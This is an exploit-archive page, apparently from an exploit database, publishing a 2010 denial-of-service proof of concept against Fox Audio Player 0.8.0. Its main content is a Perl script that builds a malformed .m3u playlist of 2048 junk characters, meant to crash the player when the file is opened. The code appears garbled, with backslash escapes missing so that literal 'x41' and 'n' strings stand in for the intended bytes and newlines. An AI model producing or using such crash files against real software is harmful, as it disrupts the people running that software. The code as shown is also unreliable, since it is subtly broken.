[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability
# Published : 2010-09-27
# Author : 4n0nym0us
# Previous Title : MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption
# Next Title : MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue


#
#########################################################################################
#                                                                                       #
#  Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability                   #
#  Author: 4n0nym0us (Arash Sa'adatfar)                                                 #
#  Developer: Leandro Nini                                                              #
#                                                                                       #
#  Software Link:                                                                       #
#  http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml   #
#  Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit                         #
#                                                                                       #
#########################################################################################
#
#!/usr/bin/perl
my $file= "Crash.m3u";
my $junk= "x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "nCrash.m3u File Created successfullyn";
close($FILE);